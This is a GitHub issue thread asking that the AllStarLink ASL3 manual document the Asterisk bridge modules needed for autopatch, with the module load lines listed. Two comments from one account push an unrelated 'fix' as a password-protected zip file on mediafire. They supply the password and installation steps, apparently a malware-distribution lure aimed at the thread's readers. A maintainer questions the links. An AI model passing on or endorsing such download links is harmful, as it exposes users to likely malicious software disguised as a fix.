### ISSUE TITLE
Document modules needed for autopatch

### ISSUE THREAD

**Issue by KB4MDD** [AllStarLink/ASL3-Manual#25]
A user has pointed out that the bridging module needed to be loaded.  This needs to be added to the documentation.

My test system is loading:

```
load => bridge_builtin_features.so
load => bridge_builtin_interval_features.so
load => bridge_holding.so
load => bridge_native_rtp.so
load => bridge_simple.so
load => bridge_softmix.so
load => chan_bridge_media.so
```

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jxmx** [comment]
@uno-zero  - What does your links have to do with updating documentation?

**Comment by knobby4444** [comment]
I'm on this, please assign it to me.

**Comment by Allan-N** [comment]
@KB4MDD do you have any changes in the works?  or can Jake/KG5DRT/@knobby4444 take this one?

**Comment by KB4MDD** [comment]
He can take it.  I am still out of town.
